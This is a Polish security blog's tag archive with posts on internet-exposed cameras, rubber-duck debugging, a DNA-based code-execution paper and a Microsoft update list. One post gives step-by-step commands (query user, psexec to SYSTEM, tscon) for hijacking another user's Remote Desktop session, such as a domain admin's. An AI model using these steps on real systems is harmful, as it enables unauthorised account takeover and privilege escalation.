Archiwa tagu: security

No i co z tego, że kamera jest w internecie?

Also available in: English English

Niedawno sekurak opublikował artykuł [1] o tym, że kamery na jednym z dworców PKP były dostępne bezpośrednio z Internetu. Pod postem szybko pojawiły się komentarze w stylu: „no i co z tego?”. Na pierwszy rzut oka rzeczywiście może się wydawać, że niewiele z tego wynika – ot, obraz z jednej kamery.

Problem zaczyna się wtedy, gdy spojrzymy na takie dane przez pryzmat dzisiejszych możliwości analitycznych. W dobie AI, rozpoznawania obrazu i analizy dużych zbiorów danych nawet pojedyncze źródło wideo może dostarczać bardzo cennych informacji: o ruchu osób, schematach zachowań, spotkaniach czy logistyce w danym miejscu.

Warto zestawić tę pozornie błahą sytuację z niedawną informacją opisaną przez The Telegraph, który donosił: „Israel hacked Tehran’s traffic cameras to spy on Khamenei […] Israel hacked nearly all of Tehran’s traffic cameras to spy on Ali Khamenei before launching an attack to kill Iran’s supreme leader.” To pokazuje, że infrastruktura kamer – szczególnie jeśli obejmuje przestrzeń publiczną – może mieć znaczenie znacznie wykraczające poza zwykły monitoring.

Nawet pojedyncza kamera na dworcu, dodatkowo z włączonym audio, może być bardzo wartościowym źródłem informacji. Co więcej, łatwo ulec złudzeniu, że takie urządzenie jest wyłącznie pasywnym sensorem. W praktyce jednak kamera IP to nic innego jak mały komputer podłączony do sieci.

A to oznacza, że często działa na starym, nieaktualizowanym systemie operacyjnym, z podatnym interfejsem webowym i wieloma znanymi lukami bezpieczeństwa. W takim scenariuszu kamera może stać się punktem wejścia do infrastruktury, pełnić rolę jumphosta, umożliwiać rekonesans sieci, a nawet prowadzić do eskalacji uprawnień poprzez podatności w interfejsie zarządzającym (np. XSS lub inne klasyczne błędy aplikacji webowych).

Krótko mówiąc – to nie jest tylko kamera. To element infrastruktury IT działający w bardzo wrażliwym miejscu.

Dodatkowo jestem w stanie się założyć ze 'administrator’ tej kamerki pierwsza rzeczą jaką zrobił po otrzymaniu informacji że jest dostępna z Internetu, w panice, ze swojej stacji roboczej (z milionem otwartych innych zakładek , zcache’owanymi uprawnieniami, a może i kontem administracyjnym). Zalogowal sie do tej nieszczęsnej kamerki by sprawdzić i 'zmienić hasło’. Jeśli redaktorzy Sekuraka mogli sie do niej zalogowac to tysiące innych też. Oni mogli nie byc tak mili i zmodyfikować jej oprogramowanie i wprowadzić złośliwe modyfikacje do jej kodu. Takie urządzenia powinno traktować sie jako skompromitowane i groźne. Dokładnie tak samo jak lekarz potraktowałby pacjenta który przyszedł na wizytę zkrawiącymi łzami i pęcherzami na skórze.

A jeśli do tego zaczniemy rozważać scenariusze, w których kompromitacja takiej infrastruktury może prowadzić do realnych, kinetycznych skutków w świecie fizycznym… to już temat na osobny wpis.

Ciekawi mnie jeszcze czy kamerka wymagała ActiveX…?

Metoda gumowej kaczuszki

Metoda gumowej kaczuszki[1][2] – nieformalny sposób debugowania kodu. Metoda polega na tym, że programista, próbując znaleźć błędy w kodzie (inspekcja kodu), trzyma w pobliżu gumową kaczuszkę lub inny przedmiot nieożywiony. Linia po linii, programista tłumaczy kaczuszce lub innemu obiektowi przewidywane funkcje każdego segmentu kodu – podczas sprawdzania powinny wyjść na jaw błędy stworzonej aplikacji.

Metoda jest wersją metody „myślenia na głos”[3], procedury uznanej za skuteczny sposób na przyspieszenie rozwiązywania problemów.”

https://pl.wikipedia.org/wiki/Metoda_gumowej_kaczuszki

Zdalne wykonanie kodu na sekwencerach DNA…

… jako medium wykorzystano odpowiednio zsyntetyzowany kod DNA…

Warty uwagi artykuł naukowców  z University of Washington:

Abstract: „The rapid improvement in DNA sequencing has sparked a big data revolution in genomic sciences, which has in turn led to a proliferation of bioinformatics tools. To date, these tools have encountered little adversarial pressure. This paper evaluates the robustness of such tools if (or when) adversarial attacks manifest. We demonstrate, for the first time, the synthesis of DNA which — when sequenced and processed— gives an attacker arbitrary remote code execution. To study the feasibility of creating and synthesizing a DNA-based exploit, we performed our attack on a modified downstream sequencing utility with a deliberately introduced
vulnerability. After sequencing, we observed information leakage in our data due to sample bleeding. While this phenomena is known to the sequencing community, we provide the first discussion of how this leakage channel could be used adversarially to inject data or reveal sensitive information. We then evaluate the general security hygiene of common DNA processing programs, and unfortunately, find concrete evidence of poor security practices used throughout the field. Informed by our experiments and results, we develop a broad framework and guidelines to safeguard security and privacy in DNA synthesis, sequencing, and processing.”

Źródło: http://dnasec.cs.washington.edu/dnasec.pdf

Remote Desktop Session Hijacking

Also available in: English English

Nie wiem czym ludzie się tak podniecają… To oczywiste, że SYSTEM może dostać się do pamięci każdego procesu więc czemu takie WoW, że mając już konto SYSTEM można przełączyć się na kontekst innego zalogowanego użytkownika?

Może dlatemu, że użytkownik ten może mieć większe uprawnienia (np Admin Domeny)… Należy jednak pamiętać że:

  1. Aby użyć metody z przełączeniem się na SYSTEM trzeba być Administratorem servera na którym się to konto uzyskuje.
  2. M$ i nie tylko mówią, że należy pracować z najniższymi możliwymi uprawnieniami więc czemu ktoś przy zdrowych zmysłach miałby się logować np z uprawnieniami Enterprise Admin’a na komputer gdzie tych uprawnień nie potrzebuje i który może być skompromitowany? Czytaj: https://technet.microsoft.com/en-us/library/cc700835.aspx  i cytat: “Do not use service administrator accounts for day-to-day administrative tasks, such as account and member server management; instead, use your regular user account.” [..] “Domain Admins credentials are required to perform the following steps:[..]”

 

Ale co to jakto?

  1. znajdujemy komputer na którym mamy Admina i na który zalogował się nieopatrznie Admin domeny. Możemy sobie pomóc poleceniem: query user
  2. zmieniamy uprawnienia na SYSTEM:
    psexec -s \\localhost cmd
  3. listujemy sesje (zapamiętujemy numer naszej sesji i nazwę sesji ofiary), oczywiście lepiej żeby sesja ofiary nie była aktywna ;-P
  4. Przełączamy się na sesje ofiary:
    tscon <numer naszej sesji> /dest:<nazwa sesji ofiary>
  5. Cieszymy się 😉

A dla tych co wolą filmiki oto wersja z YouTube:

Poprawki MS 10/2016

Also available in: English English

ku potomności MS wypuszcza od tej pory 'update boundle’ … koniec z pojedynczymi poprawkami (?)

Critical and Security Updates
Update for Windows 7 (KB3177467)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Update for Windows 7 for x64-based Systems (KB3177467)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
October, 2016 Security Only Update for .NET Framework 3.5.1 on Windows 7 SP1 and Windows Server 2008 R2 SP1 for x64 (KB3188730)
A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
October, 2016 Security Only Update for .NET Framework 3.5.1 on Windows 7 SP1 (KB3188730)
A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
October, 2016 Security and Quality Rollup for .NET Framework 3.5.1 on Windows 7 SP1 and Windows Server 2008 R2 SP1 for x64 (KB3188740)
A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
October, 2016 Security and Quality Rollup for .NET Framework 3.5.1 on Windows 7 SP1 (KB3188740)
A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
October, 2016 Security Monthly Quality Rollup for Windows 7 for x64-based Systems (KB3185330)
A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
October, 2016 Security Monthly Quality Rollup for Windows 7 (KB3185330)
A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
Security Update for Microsoft SharePoint Server 2010 (KB3118377)
A security vulnerability exists in Microsoft SharePoint Server 2010 that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Microsoft Office 2010 (KB3118317) 32-Bit Edition
A security vulnerability exists in Microsoft Office 2010 32-Bit Edition that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Microsoft Word 2010 (KB3118312) 64-Bit Edition
A security vulnerability exists in Microsoft Word 2010 64-Bit Edition that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Microsoft Silverlight (KB3193713)
This security update to Silverlight includes fixes outlined in KB 3193713. This update is backward compatible with web applications built using previous versions of Silverlight.
Security Update for Microsoft SharePoint Server 2010 (KB3118377) farm-deployment
A security vulnerability exists in Microsoft SharePoint Server 2010 that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Lync 2010 X86 (KB3188397)
A security issue has been identified in a Microsoft Lync software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
Security Update for Lync 2010 X64 (KB3188397)
A security issue has been identified in a Microsoft Lync software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
Security Update for Microsoft Office 2010 (KB3118311) 64-Bit Edition
A security vulnerability exists in Microsoft Office 2010 64-Bit Edition that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Microsoft Web Applications (KB3118384)
A security vulnerability exists in Microsoft Web Applications that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Lync 2010 Attendee – Administrator level installation (KB3188400)
A security issue has been identified in a Microsoft Lync software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
Security Update for Microsoft Office 2010 (KB3118311) 32-Bit Edition
A security vulnerability exists in Microsoft Office 2010 32-Bit Edition that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Microsoft Office 2010 (KB3118317) 64-Bit Edition
A security vulnerability exists in Microsoft Office 2010 64-Bit Edition that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Microsoft Word 2010 (KB3118312) 32-Bit Edition
A security vulnerability exists in Microsoft Word 2010 32-Bit Edition that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
Security Update for Microsoft Web Applications (KB3118384) farm-deployment
A security vulnerability exists in Microsoft Web Applications that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability.
October, 2016 Security Only Quality Update for Windows 7 (KB3192391)
A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
October, 2016 Security Only Quality Update for Windows 7 for x64-based Systems (KB3192391)
A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
Other Updates
Windows Malicious Software Removal Tool – June 2016 (KB890830)
After the download, this tool runs one time to check your computer for infection by specific, prevalent malicious software (including Blaster, Sasser, and Mydoom) and helps remove any infection that is found. If an infection is found, the tool will display a status report the next time that you start your computer. A new version of the tool will be offered every month. If you want to manually run the tool on your computer, you can download a copy from the Microsoft Download Center, or you can run an online version from microsoft.com. This tool is not a replacement for an antivirus product. To help protect your computer, you should use an antivirus product.
Windows Malicious Software Removal Tool x64 – June 2016 (KB890830)
After the download, this tool runs one time to check your computer for infection by specific, prevalent malicious software (including Blaster, Sasser, and Mydoom) and helps remove any infection that is found. If an infection is found, the tool will display a status report the next time that you start your computer. A new version of the tool will be offered every month. If you want to manually run the tool on your computer, you can download a copy from the Microsoft Download Center, or you can run an online version from microsoft.com. This tool is not a replacement for an antivirus product. To help protect your computer, you should use an antivirus product.
Update for Windows 7 (KB3063109)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Update for Windows 7 for x64-based Systems (KB3063109)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Update for Windows 7 for x64-based Systems (KB2952664)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Update for Windows 7 (KB2952664)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Microsoft Silverlight (KB3193713)
Microsoft Silverlight is a Web browser plug-in for Windows and Mac OS X that enables users to experience high quality media and to access rich Internet applications (both in and out of browser) within the browsers’ security model. For video and audio, Silverlight supports various media formats including Windows Media and H.264 up to HD quality. A comprehensive platform for creating rich user experiences, Silverlight includes the .NET framework, is supported by the Visual Studio and Expression tools, and integrates with Microsoft and other internet and server technologies.
Windows Malicious Software Removal Tool x64 – October 2016 (KB890830)
After the download, this tool runs one time to check your computer for infection by specific, prevalent malicious software (including Blaster, Sasser, and Mydoom) and helps remove any infection that is found. If an infection is found, the tool will display a status report the next time that you start your computer. A new version of the tool will be offered every month. If you want to manually run the tool on your computer, you can download a copy from the Microsoft Download Center, or you can run an online version from microsoft.com. This tool is not a replacement for an antivirus product. To help protect your computer, you should use an antivirus product.
Update for Windows 7 (KB2952664)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Windows Malicious Software Removal Tool – October 2016 (KB890830)
After the download, this tool runs one time to check your computer for infection by specific, prevalent malicious software (including Blaster, Sasser, and Mydoom) and helps remove any infection that is found. If an infection is found, the tool will display a status report the next time that you start your computer. A new version of the tool will be offered every month. If you want to manually run the tool on your computer, you can download a copy from the Microsoft Download Center, or you can run an online version from microsoft.com. This tool is not a replacement for an antivirus product. To help protect your computer, you should use an antivirus product.
Update for Windows 7 for x64-based Systems (KB2952664)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Update for Windows 7 for x64-based Systems (KB3181988)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Update for Windows 7 (KB3181988)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Update for Windows 7 for x64-based Systems (KB3184143)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
Update for Windows 7 (KB3184143)
Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.

Więcej: https://blogs.technet.microsoft.com/windowsitpro/2016/08/15/further-simplifying-servicing-model-for-windows-7-and-windows-8-1/